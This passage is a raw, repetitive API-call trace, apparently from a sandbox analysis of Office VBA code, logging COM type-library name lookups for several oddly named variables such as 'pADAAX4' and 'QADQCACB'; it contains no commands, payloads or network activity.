lHashVal=0x10f17a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62082, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pADAAX4") returned 8 [0069.048] ITypeComp:RemoteBind (in: This=0x665bd30, szName="pADAAX4", lHashVal=0x10f17a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="pADAAX4") returned 0x10f17a [0069.049] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="pADAAX4" | out: _Dst="pADAAX4") returned 0x0 [0069.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="pADAAX4") returned 8 [0069.049] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.049] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="pADAAX4", lHashVal=0x10f17a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.049] IUnknown:Release (This=0x665ba50) returned 0xd [0069.049] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.049] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="pADAAX4", lHashVal=0x10f17a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.049] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.049] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.049] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="pADAAX4", lHashVal=0x10f17a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.049] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.049] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.049] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="pADAAX4", lHashVal=0x10f17a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.049] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62082, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="pADAAX4") returned 8 [0069.049] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="pADAAX4", lHashVal=0x10f17a, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.049] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.049] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62082 | out: _Dst=0x67c2d40) returned 0x0 [0069.049] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_pADAAX4") returned 0x10e57d [0069.049] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_pADAAX4" | out: _Dst="_B_var_pADAAX4") returned 0x0 [0069.049] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_pADAAX4") returned 15 [0069.049] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.049] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pADAAX4", lHashVal=0x10e57d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.049] IUnknown:Release (This=0x665ba50) returned 0xd [0069.049] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.049] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pADAAX4", lHashVal=0x10e57d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.050] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.050] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.050] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pADAAX4", lHashVal=0x10e57d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.050] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.050] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.050] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pADAAX4", lHashVal=0x10e57d, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.050] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.050] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.050] IUnknown:Release (This=0x665ba50) returned 0xd [0069.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10cde, cbMultiByte=15, lpWideCharStr=0x144d00, cchWideChar=16 | out: lpWideCharStr="_B_var_pADAAX4") returned 15 [0069.050] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pADAAX4", lHashVal=0x10e57d, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.050] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3a62082 | out: _Dst=0x144ec0) returned 0x0 [0069.050] ITypeComp:RemoteBind (in: This=0x665ba60, szName="QADQCACB", lHashVal=0x105e91, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a620aa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="QADQCACB") returned 9 [0069.050] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="QADQCACB", lHashVal=0x105e91, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a620aa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="QADQCACB") returned 9 [0069.050] ITypeComp:RemoteBind (in: This=0x665bd30, szName="QADQCACB", lHashVal=0x105e91, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.050] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="QADQCACB") returned 0x105e91 [0069.050] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="QADQCACB" | out: _Dst="QADQCACB") returned 0x0 [0069.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="QADQCACB") returned 9 [0069.051] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.051] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="QADQCACB", lHashVal=0x105e91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.051] IUnknown:Release (This=0x665ba50) returned 0xd [0069.051] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.051] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="QADQCACB", lHashVal=0x105e91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.051] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.051] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.051] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="QADQCACB", lHashVal=0x105e91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.051] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.051] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.051] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="QADQCACB", lHashVal=0x105e91, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.051] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a620aa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="QADQCACB") returned 9 [0069.051] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="QADQCACB", lHashVal=0x105e91, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.051] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.051] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a620aa | out: _Dst=0x67c2d40) returned 0x0 [0069.051] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_QADQCACB") returned 0x10361a [0069.051] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_QADQCACB" | out: _Dst="_B_var_QADQCACB") returned 0x0 [0069.051] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_QADQCACB") returned 16 [0069.051] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.051] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_QADQCACB", lHashVal=0x10361a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.051] IUnknown:Release (This=0x665ba50) returned 0xd [0069.051] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.051] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_QADQCACB", lHashVal=0x10361a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.051] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.051] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.051] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_QADQCACB", lHashVal=0x10361a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.051] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.051] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.052] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_QADQCACB", lHashVal=0x10361a, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.052] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.052] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.052] IUnknown:Release (This=0x665ba50) returned 0xd [0069.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10d0e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_QADQCACB") returned 16 [0069.052] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_QADQCACB", lHashVal=0x10361a, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x51005f00720061, ppTypeComp=0x43005100000000, pDummy=0x0) returned 0x0 [0069.052] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a620aa | out: _Dst=0x144ec0) returned 0x0 [0069.052] ITypeComp:RemoteBind (in: This=0x665ba60, szName="XZAZwA", lHashVal=0x10289b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a620d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XZAZwA") returned 7 [0069.052] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="XZAZwA", lHashVal=0x10289b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a620d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XZAZwA") returned 7 [0069.052] ITypeComp:RemoteBind (in: This=0x665bd30, szName="XZAZwA", lHashVal=0x10289b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.052] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="XZAZwA") returned 0x10289b [0069.052] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="XZAZwA" | out: _Dst="XZAZwA") returned 0x0 [0069.052] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="XZAZwA") returned 7 [0069.052] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.052] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="XZAZwA", lHashVal=0x10289b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.052] IUnknown:Release (This=0x665ba50) returned 0xd [0069.052] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.052] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="XZAZwA", lHashVal=0x10289b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.052] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.053] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.053] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="XZAZwA", lHashVal=0x10289b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.053] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.053] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.053] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="XZAZwA", lHashVal=0x10289b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.053] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a620d6, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="XZAZwA") returned 7 [0069.053] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="XZAZwA", lHashVal=0x10289b, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.053] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.053] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a620d6 | out: _Dst=0x67c2d40) returned 0x0 [0069.053] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_XZAZwA") returned 0x10a344 [0069.053] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_XZAZwA" | out: _Dst="_B_var_XZAZwA") returned 0x0 [0069.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_XZAZwA") returned 14 [0069.053] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.053] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_XZAZwA", lHashVal=0x10a344, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.053] IUnknown:Release (This=0x665ba50) returned 0xd [0069.053] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.053] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_XZAZwA", lHashVal=0x10a344, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.053] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.053] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.053] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_XZAZwA", lHashVal=0x10a344, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.053] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.053] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.053] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_XZAZwA", lHashVal=0x10a344, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.053] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.053] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.053] IUnknown:Release (This=0x665ba50) returned 0xd [0069.053] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b10d3e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_XZAZwA") returned 14 [0069.054] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_XZAZwA", lHashVal=0x10a344, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x77005a00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x58005f00720061, ppTypeComp=0x77005a00000000, pDummy=0x0) returned 0x0 [0069.054] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a620d6 | out: _Dst=0x144ec0) returned 0x0 [0069.054] ITypeComp:RemoteBind (in: This=0x665ba60, szName="dAAQQcA", lHashVal=0x10fb7a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62126, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="dAAQQcA") returned 8 [0069.054] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="dAAQQcA", lHashVal=0x10fb7a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62126, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="dAAQQcA") returned 8 [0069.054] ITypeComp:RemoteBind (in: This=0x665bd30, szName="dAAQQcA", lHashVal=0x10fb7a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.054] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="dAAQQcA") returned 0x10fb7a [0069.054] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="dAAQQcA" | out: _Dst="dAAQQcA") returned 0x0 [0069.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="dAAQQcA") returned 8 [0069.054] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.054] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="dAAQQcA", lHashVal=0x10fb7a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.054] IUnknown:Release (This=0x665ba50) returned 0xd [0069.054] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.054] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="dAAQQcA", lHashVal=0x10fb7a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.054] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.054] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.054] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="dAAQQcA", lHashVal=0x10fb7a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.054] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.054] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.054] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="dAAQQcA", lHashVal=0x10fb7a, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.054] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a62126, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="dAAQQcA") returned 8 [0069.055] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="dAAQQcA", lHashVal=0x10fb7a, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.055] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0069.055] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a62126 | out: _Dst=0x67c2d40) returned 0x0 [0069.055] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_dAAQQcA") returned 0x10fefe [0069.055] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_dAAQQcA" | out: _Dst="_B_var_dAAQQcA") returned 0x0 [0069.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_dAAQQcA") returned 15 [0069.055] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.055] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_dAAQQcA", lHashVal=0x10fefe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.055] IUnknown:Release (This=0x665ba50) returned 0xd [0069.055] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.055] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_dAAQQcA", lHashVal=0x10fefe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.055] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.055] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.055] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_dAAQQcA", lHashVal=0x10fefe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.055] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.055] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.055] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_dAAQQcA", lHashVal=0x10fefe, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.055] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.055] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.055] IUnknown:Release (This=0x665ba50) returned 0xd [0069.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, 